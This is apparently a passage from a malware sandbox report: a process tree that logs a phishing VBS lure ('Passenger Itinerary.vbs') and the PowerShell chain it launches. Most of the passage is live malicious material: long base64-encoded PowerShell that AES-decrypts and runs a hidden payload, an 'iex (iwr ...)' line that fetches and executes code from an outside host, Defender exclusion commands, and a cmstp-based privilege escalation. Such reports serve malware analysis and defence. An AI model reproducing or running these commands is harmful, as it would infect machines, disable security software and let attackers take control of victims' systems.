ACsAbwBzAGIAdwBPAHYAeQBhAEcAUwBxAFAASQBJAEIAMwAxADUASABVAG4AMwBrAE0AQgBQAGcASQBIAGgAOQBHADMARgBPAC8AWABKAE8AZwBJAGUAWABYADkAUwB0AGcAbwBIAGIAawBoADYARgBUAFoAYwB5AFMAVwA0AFkAdwBMADcAVwBjAEkAVQB6AGgAUAAzAE4AdwBvAEUAVwBVAEcAcgArAHQAZgBqAHAAUgArAE4AQgBmAEYAVgA2AEQAMgAyAFUAZwBCADUAMAAyAFMAQgBvADkAYwBNAEwAUQAvAHEALwBFAE0AUwBSAGgAZgBjAE4ANwBCAHEASwB5AG0AawBZAGUAUwBQAFEAUgByAHQANABUADEAVwBzADMAdQBvAE8AbgB0AHcAYgAwADYAYwBzADgAMwBQAFkANAA3AFAAMAB4AEsAUAB0AGUATgBjADIAdwA0AFoAeABjAGwAOABvAGQASABWADQAMQA4AGoAVwBPAHcAYgB6AGMAdwBTAE4AQgB4AEsAUgBTAFAAWgA1AEkAVQBjAFYAUgBNAGIAMABMAGcAVwBRAFIASgBnADcAdQBkADcAYgBrAFMAOQA3AEsAVABXAFAATwAvAFkANwBCAG8ASwBVAHEAUAA2AFUATABxAFIAZQBCADQAWAArADUALwA5AHUAZgBoAEkAcgB5AGEAZwB5AHoANgBKAEQAeABDAG4AUAAxAFkARgBrAHUATgBqAFIAbwAwAHYAegBVAFcAaAB6AHAAcgB1AHcAdgBXADQAMgAyAGoATAB1AG8AOABCAFUATwBzAGsAUQBCAHkARQB1AG0AbwBqAFoAVgAyADIAVgBDAHIAcABoAG0AdgBaAEgAZQB2ADEARQA2ADIAegBaACsAdQBDAFYASABzAFQATwBFAE8AVABXADcAQgB4AGUAMQBOAC8ATgBFAFEASwBHAE4AbABlAEUAcgBwADkAdQArAEoAWgBwAHcAdQA3ADAASgBRADIAcgBKADQAUAB2AEsASQBoAEgAVABtADEATwB4AEoATgB5ADMANgBHAEUAcQBqAHkAZQBFAEoAOQBZAHUAUwA4ADAAdABvAHcAQwBVAE0AWgBjAGMAQQBlAGgAMQBaAFQAaQA3AHUAawBwAGoAZQBMAHMAVwA1ADQAbwBGAGwAMwA0AEgAMgBLAEQATQBEAEYAMAB0AE4AbQBnAFIATgBsAGIAeABCAEgAVQAwADYANAA4AG0ANgBYAHQANwB0ADgAdgA2AHoAaAB5AEUAUgA5AEkAUgBqAFkAbgBwAHIAdQBTADcARQByAHMALwBJAGIAZgAyAGUAZwBqAEcAMABaACsAbQBiAFUAWQBjAEkANgB5AHgAZQBvAFEANwBHAFAAdwBWAE0AQgAyADAALwBRADQATgBsAGYAawBqAEMARABYAGcATABwADAARABLAGwAMgBPACsAbQBmAGYAcwBmAEwAQwBHAFIAbQB4AEwAMABpAGcAZABGAEEAYQBYAGUAWgBuAEIAUwBHAHgAcQBVAEsALwBEAFYAUgB3ADcAcAAwAGUAaAA0AGcARgBDAFIAOABwAE8AeQBpAFIAeQBQADMAUwBNAEIAagBOAGYAWQBtAGQAdgBBAFMAVQBpADEAMAB6ADEAWgB2ADQANABOAGoATABtADMAZABNAGQAZgA1ADUAQQB1AGEAMgBhADEATwBaAGMASABiADkARwBvAFAAYgBmAGYAVwB6ADMASgB1ADUAZwBFAFQASABuAFQAcQBMAG8AbwBUAFQAbABMAEEANABYAGQAdQBoAFcASQBVAHkAbABaAGkARwBCAGoAUwB0AHAAUgB2AE8AMwBiAC8ATgBMAHIARwA2ACsANgBNAEgAVwB1AEEAVAB1AEoAZABHAFQAagAzAC8AZgAwAHUARAAxAGMAVQBrAGEAdABsAHMATABxAGEAbgBrAEoAeQBkAHUAMgBVAFoARQBGAE0AVwAxAHUARwBRAHUARQBOAEUASwBYAHgATwBGAC8AZQBBAHMALwBGAGMAVgBUAFYARABFAFcAOQBhAHYAUwB5ADIAcwBwAG4AeABVAFgANwBJADgAYQBWAHgARgBqAHUAagBmAEYAWQBrAG4AdgBjAFcATQBYAFMANABJAEMAVwBuAGoAagB0AG4AbQBoAGoAbAA4AGQAZgBqAHAAdgA2AHEASwBZADMATAAvAEwAbwBCAFQANQBlAGYAegBpAGcAZAArAGkAdABaAGkAZQBsAHUAcgBkAEQAcgB5AFIAZwBlAEwAZABqADMAdwB6AE4AegBWADcAQwBjAGcAaABGADMAMQBwAGgARABIAFcAYgA0AEYARABWAFgAVwBqAG8AZgBVAEwAZABEAHQATQB6AHAALwBZAGgASwBoAFcAUABxAHYAQQA5AEUAegBmAGcAYwBtAG4AVQBlAGoANwAvACsAOABxADYAOAA5AGkAdQBJAGYAWAB5AEwAMABzADIASwA5AG0AdgBXAFEAVgBqAEUAQwBpAE0AegAvAE8AKwBGAFgALwBqAG8ARgBEAGYAbAB0AHkAdgBsADAAaQBJAHoAbQBnADEAVQA5AE8ASgBzAHUAUwB5AGoAdQBqAHMAYwA2AGUAWABLADkAaQBUAGgASABzAEoAMwBrAE4AWQAzAFYAUQBDAEwASwA2AEEANQBPAGkATQA4AEUAYgBDAG8AagBaAHkAYwBYAEcAUgBQAE0AcwBnAFQANAB6AEMAcgBrAEcAKwBwAG4AVgBPADYAMABrAGMARQBqAEMANwByAFYAegBTAGQATgBSAGIAKwBhAEoANwBwADEAQQBnACsAUABaAFoAZwA2AFgAKwAxAFQAbQAzAEEAYgBYAHoAZQBFAGYAaQBMADQAQgBxAG4AYwBZAEYAQgBnAHAAQQBMAFYAbABzADQAQgBIAHYAdgBuAGsAUQBBAEUAaAA2AHQAawBPAHcARgBjAGcARgBIAEIASwBKADAAUwB1AHcAUQBkAEIAMgBuAEQAMABXAG4ASQArAEkAagBJADMAQQBTAHYAaAB5AE8AawBvACsAYwBCADEAawBIADAAZQB0ADQAZgBKAGQAZABLADYAMQB6AGEAcAB2AEcAbgBYAEEAZwB6AGwAQwBEAFQAbABrAEYAcwBaAFkASQBKAFoAbAAyAE0AdQBrAEkAUwBCACsAcABZAGYAeABXAHcAdAAvAFYARABZAEsAcgBNAFcAUwAvAEwASwBtAHAAdwBEAGUAMAArAE0ATwAxADEATQBXAC8AWQBOAGcATwB5AEYARgBUAEwAUAByAHcAeABOAEIAMwBpAEYAYgBPAGEAMABqAG8AOQBuAHAAdgB2ADcATwBMAFkAUwBXAEkAcgAxAG4AaQBIAHkAMABGAEMAMwB5AGoAcABoAGIAcgA4AGoAcgBhAEsAZABCAHgAZwBvAEUARAAyAE8AcwBaAFMARABHAHMAawBjAGYAeQBIAE4AUABPAE8ANQBjADEANwBkADAAZwA4AEYARgBYAFkAcwBRADUAZABaAGgATQBBADkANABLAFcAOAA4AEMAQwBZAGcAQQA5AEkASgBlAG4ATwAzAEwASABOAFgASwBEAEsAYgAzAGUATABSAHUAZwBDADAATAA0AHgAeQA5AEwARgBKAFQAMgAvAFgAdwBTAHAANQBNADkAZQBlAG0ANwBxAEYANwBvAFIAYwBtAEsAYwBrAGoAQwBJAEIAbwBoAHcAQQBsAHMAdgB1AE0AVwA3AFAASwAyAFQAeQAwAEIAUABVADMAbwBIAG0AaQB0AG8AbAAzADYAMQBiAFEARgBiAFkAawBOAEcAQwBSAEYANABxAFMAdQBUAGEAKwBxADEAMQBmAGMAeAAwAGQASABBAFAANABlAFIASgB5AFUAawA1AHMAYQBnAFAAagBPAFQAcQBxAHYAbgBQAEEAbwBrAHEAMgBaAFUATwBtACsAdgA1AGUAeABqAGwAdQBnAG0AUgBQADgAeABEAFcAOQByAEkAMgBWAGsAKwBZADYAUgBBACsAVABUAFcAbgBGAFMASwBHAG4AZwBnAEIARQBaAHUAeQBiAGYAQQBCAG4AWgBHAEIAOABIAHIAVQBhAHEAdQBZAC8AbgBCAEQARwAyAGMAWQByAC8AUgAvAEQAdQBaAEEAaQBuAFQAdABNAEQARQBtAC8ATgBDADMATwA5AEQALwBqAFIAUABwAE8AcgA0AC8AMAByAHQARgBvAG4ANgBxAFUASwBZAFcAaAB3AHgATAAvAFoANwBlADkAawByAGIAcABVAGIAeQBPAHQAUQBpAGkAUABYADMAYgBmAHQAVQBkAHoAMwBzAFcAQgBPAGMAWgBJAGgAUQA1AGsAagBXAGcAawAwADgAdQBNAFIAYQBQAFEANQBoAGgATQA2AGcAcQAzAE0AbgBRAEcAYwBXAE0AVABZAFMAWABqAEMAZwBvAGQAMgBWAHIARABEAEYAQwBlAGMASQBuAEIAdgB0AGQAVwBzAHEAUgBFAFUAKwBZADEAMAB4AEwAOAByAGkAagBqAFQAQQBpAHkATwB5AGoAOABBAHcANABmAEkAcQArAGoAZQBKAGsAMQAwAHYAZgB4AG8AMgBtAGoAOABaADMAYgBUAEkAdgB5AEwAMABMADIAUQAwAFcAegBaAFgAawA5AGkAdwBHAGYATABUAHIASwAwAEoASABGAFAAdgBEAHMATAA2AGIARQByAE4AawA1ADgAOABvAHQANQBFADIASAB0AE8AcgBhADYAMABCAFcANwAzADkAMwAvAFoAawB2AHAAQgByAGsANABxADAAdQBYAGIANwBVADIAMQAxAEgARQBYAEwATgBPAFgAMwBlAGwAbwByAGsAOQBYAEUAbgBBAFgAVgBKAFMANgBrAGoAbABXADIAbgA3ADYAVwBtAEMASwB4ACsAZABWAEwARgBRAFUATgBSAHYAWAArAE0ARwBLAFMAcAAzADcARwBCAHEANAA0AE4AaQByAEwAMgBIAG8AaQBxAE8AKwBGAGwAVQB1AGgAdwB6ADEAMwBGAGoATAA2AHAAdwBrAFYAYwBpADgAcwBCAFAAVgBiAEoANwBYAHQATAA4AGUARABjAE4AZgBnAEYARgB3AE4AbgAyAHIATgBwAEMANgBWAEgAbABwAE0AaAB2AE8AYwBmAHQASQBYAEYATQBwAHcARAA5AEoAbgBRADIAbgBtAGYANAArADAAYQBjACsASwAwAE0ALwBOAEwAMABOAHAAawBVAC8AUQAvAHUAWgBRADUAbABRAE4AZABzACsAaABVAHQAQgBMAEkAVwBiAC8AZwBXADkAYgBnAGUAUABKAEYAagBhAHAAUwBaAGUAcgBMAHkARAA3AEcAeAA3AEMASQBkAEMARABHAGsATQBmAFMAaABoAFAAcgBuADEAaQBsAE8AeABKAFMARAA2AFcATwB4AFoASgA2AHkAZwBPAGQAOABRADkAVQBtAFgAbgBiAFIAMgArAEcALwBDAGQAVwB4AFYARwBXAGEAMQBqAGMAdABOAEkAWAA4AE8AUQBOAHMAbwBQAG4AdQBSAHQAVQAzAGkASABLADUAZQA2AFAAVABYAC8AdQBwACsAeABYAHYARgBwADMASQBVADQAZABCAG4AUQByAFUAZwBpADkAaQBrAG4AZQBKAGEANwBhAG8AcABQAEYANgBYAHgAVwBCADAARwBGAEwAcABYAGQASABhADcAYQBiAE8AVwA0AGIAcwB3ADgAUABYAHgAeQBrAG8AegBFAE0AbQBuAHQAUgBOAHkAcwBIAGIAbgBqAFoAcABwADEARgByAFYAeQBiAFoAaABnAFAAYwB0ADUAZABpAGIANABBAGgANABqAG4AbgBEADAAaABvAGIAawBpADYANwBqADMAUwBrAEcAWQBEADkAZABNAEoATAA3ADgAUgBqAC8ATQBlAGEAMAB0AGUASABBADQAcgBzADMAWgAzAHMALwB1ACsATgBLAEsAcgBWADcAQQBBAGMAeAA1AFgASABEAFUAWgBTAC8AUQB5ADYASwBWAHIAcgBsAGYATAByAHAAeQBhAE0AMQBCAE0AUQBvADIARAA1AEgASQBIAHMANAAzADYAZQA2AFEAYQBpADEANAA1AFcASgBBADgAeABMAGwAVwBrAEUATABHAC8ANABGAHQASABZAEoAVwByAGQAWQB2ADYANwBJADQANABMADkAZABTADgAcwA2AHgAcgBHAFgANgBNAE4AdgBTAHEATgA2AE8ARgBIAFEAQgB3AFAANABrAGoAMgBTAGUAaQBSAGIAWQBpAFAAaAA5AGcAUgBiAHoAaQB6AFYAcQBZAFoAYwBKAHEAMwBWAGgAegBGAGgAeQB5ADYANgBRAG4AQwBCAFEAbwBmAE0AQQBRAEMAagBSAE0ATgBjAGIAdgA2AGQAVABQAEQASgB2AGoAawBwADEAZwBVADgANgBHAGwAVgBVADUAVAB1ADYATgBOAGwAOAB6AEcAdwBUAGIAaQBlAEgATQBJAC8AUgBXAGUAWgBNAGgAawBpAG0AbgBGAE4AbwBvAEIAQgBQADYAYQB5AEIASwB5AHYAZwBDAE0AZABkAE0AUgBJAFMAdwBpAEcAQQBVAEYAeQBPADgAZQBBAEMAcABYAGkAQwA0AGQAWgBFADMAZABYADcAUABhAFMAcQBkAHUAMwAzAFUAKwBIADQAOABLAEsARQBsAFkATgBKAEEAMQA4AGUARQBoAEUANgBlAGgAYwB4AEoAeQBLADQAbABKADkAMwBSAEEAYgBmAE8AZwBWAEkAdwBqAFgATQB2AEoAdgBnAGUAYgBiAHoAMABXAFAARgBrAHYAeQA3AHYAbwA4AHcAbABSAHMAVQBXADQAMQBWAE8AcQA2AHMAaABHAHQAUAAyAFIATwBsAGcANwAzAFIAOQBOAEQAVgA5AFcAdABtACsAbgBQAGcAbwBiAHIAegBqADIARwBJAE8ARwBrAGUAVABhAGYAUgBsAFUARgBhACsAMwBvADUAQQA4AEsAMQBMACsAYQBuADAAcgBBAEsAQQBNAGoARwBsAEgAagBFAHMARgBzAEQASgBrAEYARABzADcAYQBBAEQAbABDAFgAbABLADIASQBaAE8ASABLAGEAZABvAEIAMwBvAFMARAA2AEIAUgBsAFkAZgBxADMATABSAC8ANABhADgAQwA0AGEARABVAFkATgAwAFMAbAB2AHEAZQBkAHcAawB6AG0AMQBDADQAegBsAG8AWgBJAGoAUgA2AHQAZwBJAFMAVgB5AFkAbQArAHQAeQBFAEMAUQBJAE0AWABlAGIASABSAEcAYQBWAE4AeABLAC8AeAA3ADUAawBEADkAUwBvAEgAdQBTAC8AVgBIAEsAQwBKAFkAYgBkAEYAMQA1AHoAZQBsAEkAeABkAFUAegBiAG8AcgBtADgANQAzAFIAMABRAEEATABkAGIANwA2AC8AcgAxAG8ARQB4AHkASgBFAEIAaABXADgAMgBEAHAATwBpADkAcQAvAGMAcQBkAG4ALwBkAHUARABuAGoAVAA2AEMAcwBXADcAdQBYAFIAYgBXAEgAWgBvAHgARABzAGEANABvAEEAQwBIAEsAcwBrAFcAaAAyAGYAYQB1AFIASABnAE0AVQBsAFIANQBXAHMALwAvAHMAMgBRAFIAQgBpADcASwB2AHcAYQBFAEYAUgBMADUAUQBuAHMASwBUAGQARABhAHEANwB2AGYAdgBUAFIAMABKAE0ANwAyADUAdAB2AGUAVwBQAEEARABEAGgASQBBAFYANQArAEEAegByAHkARABsADUAVwB6AEwATgB5AHgAYwBGAE4AcgBBAEwAOAB0AEEASABaAFIANwBTACsAeABzAHoAagBJAE0AUQBhAFMAdABKADIAdgBPAEwAOAAwAFgAMAA1AGkAOABuAE4AVwBYAHIALwBRAHUANAB1ADMANwB6AEwAUQBuAGEAOQBMAEIAZQBPADAASABKAG0AZwBJAHgAdgBrAEgANgA2AFIAWAA1AEIATABMAGUAcQAzAFkARQBhAFkAcABYAFUAKwBWAEIAMgBXAEsASgBPAEUAUABNADkAYgBVAFoAMwBPAHYAMQBkAGYAQwBhAGwANwBkAG0AMABKAHcAUABjAFYAWAAzAGIARwBFAE4AVwByAFYAUwByAFUAUQBPAFIAQQB5ADAAWABkADIAVwBIAEgALwBlAEgAWgAxAHIATQBHAGYAWQBRAGEAKwB5AGMAdwBUADUAMgBSADIAZwBVADcANgBwAE0ANABuAFUAMAA3AEsARgBjADYAaABOAHgAMABWAGIATAA4AEYAMQBNAFYAbAB4AGwARABhAE8AaQAvAGUAZQBMAFkAMwA4AFMAOABkACsAawB1ADIASgBZAEMALwA5AE0ATQBNAG8AVQBLAHAATQAxAEkARgBDAGgATQBzAFAAcgA5AEkAYgBQAFYARABNAEsANQBCAEEAMAAvAEgAdgA3AGQARwBwADgAUABsAHEAQgBYADkAbwBSAGoATQBwAE8AWABEAEYARABLADkAKwBvAHkAaQA3AE4AMQBXAGUASgBYAE0AWQBaAHcAUgBjAEYAeABtAFMAWgBGAGgAdQBFAG8ARgB5AHgASwBxAEkAMwBoAGYAKwA4AGQAWQAwAEsAWgBBAHEAQwBxAC8AagBKAFkAQwBXAE0AUwBqAEcAWgBRAEkAaABKAHIAOQByAGEARABFAGkATAB0AGwAcgBUAGgAVwAwAG8AYQAyAHEAQQBtAC8AcwB4AHEAbABzAG8AQwBpAGoAZQBBADIAeABTAE4AawBkAGoARAB0AE8ARAA5ADIANABuAE0AQgBOADQATQBQAFUAVwAwAEoAVgAvAHkAawBhAHoAcwBGAG0AdABlAGoAQQBBADMAWgBsAEIAawBPADQAdABOAHAASgBEAGsAaABwADAAMAB1AEUARAAxAEMALwBWAHMAZwBhADkAcQBqAEsAUABVAGQATgBsAHkAeQBqAEEAQgBOAFgAUABXAHQAMgBPAFIAZwA1AFoATQBUAFQATQA2AE0AUwBtADIATwBWAGIATgAvAFoAeQBUAE4AYQBvAGMARgBaAFgAQwBRAGgANQB5AFoAegBxAG4AeABLAE8AdgB1AGUAZwBNAGYAbABaAHQAWgAwAG4AQwBWAE4ATABRAGEAaABxAGsAQwA3AFMAcABrADcAWgB2AG8AaQBtAEsASABkAFQAdAB5AHYAUABsAGQAWAArAFUASwAyADEAcQA4AGIAbABJAGIANgBPAGUAYgBvAEoAMQBrAFAAMQBoAEUATQBaAEQANQA5AGIAZQBzAEgAMwB5AGIAVABFAGkAbgA5AHEANgAxAE8AVgA0ADEALwB4AGQATQA5AFEAawBkAGEAMgBmAG4AZQBCAGMAQgBEADUAQQAxAHMAVgBoAHYATQBLAHQAWQBOAG4AaABHAGoAcQB1AG8AbgBGAFEAcQB4AHAAUgBxAFIAZwAyAGEASABYAE0AUgB5AHcAbwAzADEATQBzAGwAWgBaAFIASABBAHYAMABEAHIAYwB3AGQARAByAGYAOABDADYAWABEAEgAMQBQAHcAWgBVAFMARwA3AEkAMgBTAHIAcQBBAGsAUwBFAE8ASgBPAGUASQBUAGUANABYAEoAOQBwAGcAUQBxAEMAdAB4AEMAMgBkAGUARABqAHUASQBaADkAMQBRAGQAbQBkAGgAMwArAFYASgAzAHkAKwBVADIAdQBJADgASwBPADgAMABYAEsAMgBRAFgAeABrAG0ASABIAG8ARgB1AGsANAAzAG8AdABTAEgARwBKAFgAQwA1AFoAZwBaAHYAcgA5AHkAYwArAGIARQBqAFYATwB3AFcARwBKAEcAUgBDAGIAaQBvAEUAbAAzAHcAegA4AGIAUwA4AEIATABrAHYARwBpADUAZwBHAGYAbQBMADkAbAB3AHoAUgBJAEwAVwBZAE8AbQA1AHUARwBXAHQANgBJAHoAKwBnAHcAMQArAFIAUABlADYASQBtAHgAVQBkAHcAZwBCAGcAVABoAEsAZABOADIAWQBGAEwAUgBhAGsAcgBQADcAdABEAGMANQA1AFMAbABFAHkAZABWADAAbwBaAEEAUABYADEAdABtAHAAdgB5AEIANgA0AHcATwBuADcAMABKAEUANABiAEkAQQBuADMATgBuAFgAZwBVAFcAQgBaAFIASwBjADYAbAByAHAAeABZAEwAMgA3AHkAaQBvAEYALwBPAGYAMQBIAEgAUAB0AHkAcgBWAEIANAAvAHIAZgB1AC8AUgAzAFIAMgByAGYARAAvAFQATQBvACsARgB3AFgAaABYAFMARwBqAHkATABuADcAKwBxAFcAdABaAGcAQwBJAHgAUQBIAFkAbwBiAGUAUgBDAHIAQwBBAFUAZwB4AHEAZgBJAGUAegBPAEgASQA4AGEAeABKAHMAUgBtAHQASgArAGYAMgAyAHEAMQBPAGIAagBvAFYAbABDAG8ATwA3AEgAZgBLAE0AdgBwAGkAMABaAEMAbwBzAGQANQBtAFgAKwB1AGgAbABGAGYAQwBKAFMALwBkAFYAeQBOADgAawBLACsARgAxAHAAMgBzAEcAcABCADMAWgBrAEIAYgB0AGwAWAA3AG4AeQBJAGcAQgBaAFgANgBEAEYAcgBmAEwAUQA4AFMANQA4AE0AZwBaAGsAWgBTADQAYgAwADEAOABFADQAZwA5AEMAeQByAEMAVQBvAGIAMwBhAHUAQgBMAG8AQQB5AHYANAB0AEQAWQBPAGsAOABnAGsASwB6AFUAZgA0AHQAdQBtAEUAcQByAHAAWQB4ADQAbABPAGIAdQB6AHUAMgBEAEEAOABBAG8ALwBwAEMAVwArADYAUQBaAGEAaABiAG4AUwBDAGIANABhADAAVwBVAG4AYgBJAE0AVQBlAEoAZABKAEkAeAA1AFcAOAB0ACsATQBUAHQASAB1AHUASABpAFIAawA4AGIAbwBDAEEATwBtADUAdgBXAGsATgB1AGwAeABxAC8ALwBkAFQAZgBSAFAAZwBGAEUAVQBQAHgANQBGAGgAegBKAE0AcwB1AGMAYgBhAEwANQArAFQAdABkAGwATgBxAFgAZAArAFcAMgBsAGQAUAAxADUAbwArADgAZQA0ADkATwB1ADAASwA5AG0ARwBaAHQAVwBhADcASAAwAHEAeABEAGwAMgBkAEMAZABPADgARQBBAFMATQBIAEsARABBAFUAZwA3ADkARwBNAG0AMwArAGMAVwArAHYATgBRAHoAQgBDAHcANAAwADQAWgBQADYAeQA3ADYAYwBHAGwANABrAE4AcgBHAHkAaQBrAFAANwBhACIAKQANAAoAIAAgACAAIAAkAGkAIAA9ACAAJABkAFsAMAAuAC4AMQA1AF0ADQAKACAAIAAgACAAJABlACAAPQAgACQAZABbADEANgAuAC4AKAAkAGQALgBMAGUAbgBnAHQAaAAgAC0AIAAxACkAXQANAAoAIAAgACAAIAAkAGEAZQBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQQBlAHMATQBhAG4AYQBnAGUAZAANAAoAIAAgACAAIAAkAGEAZQBzAC4ATQBvAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBDAGkAcABoAGUAcgBNAG8AZABlAF0AOgA6AEMAQgBDAA0ACgAgACAAIAAgACQAYQBlAHMALgBLAGUAeQAgAD0AIAAkAGEADQAKACAAIAAgACAAJABhAGUAcwAuAEkAVgAgAD0AIAAkAGkADQAKACAAIAAgACAAJABkAGUAYwAgAD0AIAAkAGEAZQBzAC4AQwByAGUAYQB0AGUARABlAGMAcgB5AHAAdABvAHIAKAApAA0ACgAgACAAIAAgACQAbwB1AHQAIAA9ACAAJABkAGUAYwAuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkAGUALAAgADAALAAgACQAZQAuAEwAZQBuAGcAdABoACkADQAKACAAIAAgACAAJAByAGUAcwAgAD0AIABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABvAHUAdAApAA0ACgAgACAAIAAgAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgACQAcgBlAHMADQAKAA== -inputFormat xml -outputFormat text
                              4⤵
                              • Command and Scripting Interpreter: PowerShell
                              • Suspicious behavior: EnumeratesProcesses
                              PID:2992
                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\byewnwba\byewnwba.cmdline"
                                5⤵
                                  PID:2728
                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF4EF.tmp" "c:\Users\Admin\AppData\Local\Temp\byewnwba\CSCBD104D52795439298FD9C6C17D11038.TMP"
                                    6⤵
                                      PID:2364
                                  • C:\windows\system32\cmstp.exe
                                    "C:\windows\system32\cmstp.exe" /au C:\windows\temp\jsb3ci3v.inf
                                    5⤵
                                      PID:4684
                            • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                              "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                              1⤵
                                PID:2552
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                1⤵
                                  PID:3220
                                • C:\Windows\System32\rundll32.exe
                                  C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                  1⤵
                                    PID:3712
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -WindowStyle Hidden -c .('Add-MpP' + 'reference') -ExclusionPath 'C:\'; .('Add-MpP' + 'reference') -ExclusionProcess 'powershell.exe'
                                    1⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Drops file in System32 directory
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:5004
                                  • C:\Windows\system32\taskkill.exe
                                    taskkill /IM cmstp.exe /F
                                    1⤵
                                    • Kills process with taskkill
                                    PID:2668
                                  • C:\Windows\System32\WScript.exe
                                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\Passenger Itinerary.vbs"
                                    1⤵
                                    • Checks computer location settings
                                    PID:808
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "iex (iwr -Uri https://emptyservices.xyz/vbs.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
                                      2⤵
                                      • Blocklisted process makes network request
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:4220
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -encodedCommand DQAKACAAIAAgACAAJABSAE8AcQBGAHcAZwBvAEEAIAA9ACAAMgA1ADEAMAANAAoAIAAgACAAIAAkAFMAagBYAFEAVQB4AGIAWAAgAD0AIAAoAFsATQBhAHQAaABdADoAOgBTAHEAcgB0ACgAJABZAEgAWQBVAHIAZgBPAHoAKQAgACoAIAA0ADQAKQAuAFQAbwBTAHQAcgBpAG4AZwAoACkADQAKACAAIAAgACAAJABKAFMAVQBTAG0ATQBVAFkAIAA9ACAAIgAyACIADQAKACAAIAAgACAAJABVAGIAZQBFAGMAWQBPAGYAIAA9ACAAIgBTACIADQAKACAAIAAgACAAJABVAGQATwB3AEsAZgBJAHgAIAA9ACAAIgA2ACIADQAKACAAIAAgACAAJAB6AEQAZQBiAG4AeQBBAEYAIAA9ACAAIgBWACIADQAKACAAIAAgACAAJABzAE8AcQBWAE4AWABWAGYAIAA9ACAAIgBHACIADQAKACAAIAAgACAAJAByAG8ATwBaAHEASQBhAHcAIAA9ACAAIgBLACIADQAKACAAIAAgACAAJABmAEEAZQB5AEUAagBoAEMAIAA9ACAAIgA3ACIADQAKACAAIAAgACAAJABQAFEAWQBzAFAAbABBAGcAIAA9ACAAIgByACIADQAKACAAIAAgACAAJABPAFAASQBhAEYAZABaAEcAIAA9ACAAIgBxACIADQAKACAAIAAgACAAJABtAHUAZwB3AEgAdwBpAE4AIAA9ACAAIgBsACIADQAKACAAIAAgACAAJABnAFIASABxAEcAeQBYAEUAIAA9ACAAIgBsACIADQAKACAAIAAgACAAJABmAEIAbgBsAE0AQgBaAEYAIAA9ACAAIgBGACIADQAKACAAIAAgACAAJABFAE4AZQBYAGYATwBOAE4AIAA9ACAAIgBLACIADQAKACAAIAAgACAAJABmAFMATgBGAHIAWgBCAEcAIAA9ACAAIgBKACIADQAKACAAIAAgACAAJABuAHgASgBGAEkAYgBSAEQAIAA9ACAAIgBiACIADQAKACAAIAAgACAAJABPAEYAVQBGAFoAYQBiAFoAIAA9ACAAIgBrACIADQAKACAAIAAgACAAJAB0ADEAIAA9ACAAOAAwACAAKwAgADgAOAANAAoAIAAgACAAIAAkAHQAMgAgAD0AIAAoACQAdAAxACAAKgAgADQAKQAgAC0AIAAoACQAdAAxACAALwAgADkAKQANAAoAIAAgACAAIAAkAHQAMwAgAD0AIAAiADIAIgAgACsAIAAiAFMAIgAgACsAIAAiADYAIgAgACsAIAAiAFYAIgAgACsAIAAiAEcAIgANAAoAIAAgACAAIAAkAHQANAAgAD0AIAAiAEsAIgAgACsAIAAiADcAIgAgACsAIAAiAHIAIgAgACsAIAAiAHEAIgAgACsAIAAiAGwAIgANAAoAIAAgACAAIAAkAHQANQAgAD0AIAAiAGwAIgAgACsAIAAiAEYAIgAgACsAIAAiAEsAIgAgACsAIAAiAEoAIgAgACsAIAAiAGIAIgAgACsAIAAiAGsAIgANAAoAIAAgACAAIAAkAHAAIAA9ACAAJAB0ADMAIAArACAAJAB0ADQAIAArACAAJAB0ADUADQAKACAAIAAgACAAJABhACAAPQAgAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAQgB5AHQAZQBzACgAJABwACkADQAKACAAIAAgACAAJABkACAAPQAgAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAIgB0AEQAYgAvADEAWABhADAAVQBNAHUATgBlADMASwBzAFoAawB3AEEAYgBvAEUAaABtADQAUgBEAHkAWQB4AHQAKwBxAGoAZQBFAEUAdAA3AHoAdAA0ADAASQBPAFQAdwBrAHgAdQBmAG8AcgBnAE0AbwB2AEUAUAB3ADUAZAA1AHYAaQBaAEIAdwBiAHMAZAAvAFkAZgBQAE8AMgBZAHkARABjAEMAaQBkAFQAQQB0AGwAYgBXAHMAUQB4AGUAVgB2AE8AQwBxAE4ARABPAHgA